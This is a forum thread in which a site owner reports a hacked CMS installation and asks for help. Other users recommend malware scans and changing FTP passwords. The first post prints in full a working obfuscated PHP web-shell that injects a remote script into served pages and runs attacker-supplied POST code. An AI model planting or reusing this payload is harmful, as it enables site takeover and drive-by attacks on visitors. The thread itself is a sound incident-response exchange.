We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 23849
    • 223 Posts
    Hi All,

    I think a site of mine may have been hacked. I found the following block of code at the top of these pages:
    index.php
    manager/includes/config.inc.php
    manager/index.php
    manager/includes/extenders/dbapi.mysql.class.inc.php
    manager/includes/settings.inc.php
    manager/includes/user_settings.inc.php

    <?php eval(base64_decode('aWYoIWlzc2V0KCRzamgyMSkpe2Z1bmN0aW9uIHNqaDIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWhiSGRoWjNKaGJXbHVZbUZ1YXk1amIyMHZjR2h2ZEc5bllXeHNaWEo1TDJZMUxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBzamgyMigkYSwkYiwkYywkZCl7Z2xvYmFsICRzamgyMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkc2poMjEpKWNhbGxfdXNlcl9mdW5jKCRzamgyMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdzamgyJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3NqaDInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kc2poMmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3NqaDIyJykpIT0nc2poMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>


    I restored the files and changed all my passwords so everything is OK for now.

    Anyone else seen/had this issue before?
      Nick Hoag
      Creative Partner
      The FutureForward

      http://thefutureforward.com
      • 26931
      • 2,314 Posts
      Hi Nick,

      i would recommend to scan your local computer for trojans too + changing your ftp passwords
        • 23849
        • 223 Posts
        Thanks shark - avast actually found something right off the bat. I’m scanning now and using malwarebytes’ anti-malware program as well. Thanks for the advice!
          Nick Hoag
          Creative Partner
          The FutureForward

          http://thefutureforward.com
          • 26931
          • 2,314 Posts
          I’m scanning now and using malwarebytes’ anti-malware
          yes, malwarebytes was recommendet for that specific ftp exploit in some articles